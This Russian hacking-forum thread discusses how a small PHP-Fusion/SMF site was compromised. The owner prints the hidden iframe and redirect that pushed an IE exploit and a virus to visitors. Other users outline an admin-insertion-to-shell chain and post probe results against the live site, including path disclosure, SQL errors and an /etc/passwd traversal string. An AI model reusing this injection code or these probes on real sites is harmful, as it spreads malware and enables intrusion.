 |
|
31.10.2007, 07:59
|
|
Banned
Регистрация: 20.08.2007
Сообщений: 196
С нами:
9855746
Репутация:
211
|
|
Сообщение от nbd
А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек  Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (: ссылку на сплоит плиз
|
|
|
31.10.2007, 11:47
|
|
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами:
9757346
Репутация:
2
|
|
Сообщение от nbd
А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (: Нету логов...  Форум то можно хакнуть тогда, только у меня была IPB но она была паленая, и на хосте забанили мой форум, пришлось SMF ставить... н оя в ней пока вообще не раздуплился да и както пашет - пусть пашет... прос токакойто двиг после IPB туповатый...
|
|
|
|
02.11.2007, 09:29
|
|
Познающий
Регистрация: 27.10.2006
Сообщений: 90
С нами:
10284094
Репутация:
68
|
|
Сообщение от Фещ
ссылку на сплоит плиз
http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:
|
|
|
|
02.11.2007, 13:52
|
|
Познающий
Регистрация: 04.08.2005
Сообщений: 62
С нами:
10929474
Репутация:
46
|
|
Сообщение от nbd
http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:
у меня ссылу не открыл
|
|
|
|
02.11.2007, 22:44
|
|
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами:
9757346
Репутация:
2
|
|
По информации от хакера, как я получил, и...
В общем, сайт хакнул не по локали. Где то в скрипте есть дырка, какая и где я незнаю, но php-fusion.int.ru хакнут щас также как и мой сайт (ВНИМАНИЕ! НА САЙТЕ ВИРУС В IFLAME!)
В общем, вот как меня хакнули:
Создана новая панель:
Код:
echo("<iframe width='0' height='0' scrolling='no' noresize src='http://novor.info/iframe.php'>");
В этом файле:
Код:
<script>document.location.replace("http://58.65.234.105/cgi-bin/nsp15/in.cgi?p=spuser");</script>
А дальше сам эксплоит. По той ссылке IE получает эксплоит и вирус, а остальные браузеры -- просто редирект на google.com. |
|
|
|
02.11.2007, 22:46
|
|
Banned
Регистрация: 20.08.2007
Сообщений: 196
С нами:
9855746
Репутация:
211
|
|
Сообщение от spyke
у меня ссылу не открыл Forbidden
You don't have permission to access /showthread.php on this server
wtf?
|
|
|
|
02.11.2007, 23:51
|
|
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами:
9757346
Репутация:
2
|
|
http://www.php-fusion.co.uk/forum/viewthread.php?forum_id=38&thread_id=18898
перевёт как мог на англ и задал вопрос на офф сайте движка.
|
|
|
|
11.11.2007, 17:38
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами:
10787366
Репутация:
2277
|
|
[pasкрытие путей]
http://alexalx-soft.com/infusions/pro_download_panel/download.php?catid[]=63
/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php
http://alexalx-soft.com/infusions/shoutbox_panel/shoutbox_archive.php?rowstart=28888888888888888888 8888
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3 |
|
|
|
14.11.2007, 04:39
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
file_exists() [function.file-exists]: open_basedir restriction in effect. File(themes/../../../../../../../../../../../etc/passwd%00/theme.php) is not within the allowed path(s): (/home/vshosts/hosts/u5034/alexalx-soft.com/:/usr/home/vshosts/hosts/u5034/alexalx-soft.com/:/virtual/vshosts/hosts/u5034/alexalx-soft.com/) in /usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php on line 196
несовсем понял возможен ли инклюд локальный (чет не до ковыряния сейчас, сплю почти) но раскрытие путей опять же, в пост-переменной user_theme при редактировании профиля (edit_profile.php)
__________________
Карфаген должен быть разрушен...
|
|
|
|
23.11.2007, 16:23
|
|
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами:
9757346
Репутация:
2
|
|
Сообщение от halkfild
[pasкрытие путей]
/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3
Такс... Щас посмотрю что там... Спс...
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Обзор бесплатных Cms
|
em00s7 |
PHP |
16 |
03.07.2009 13:13 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
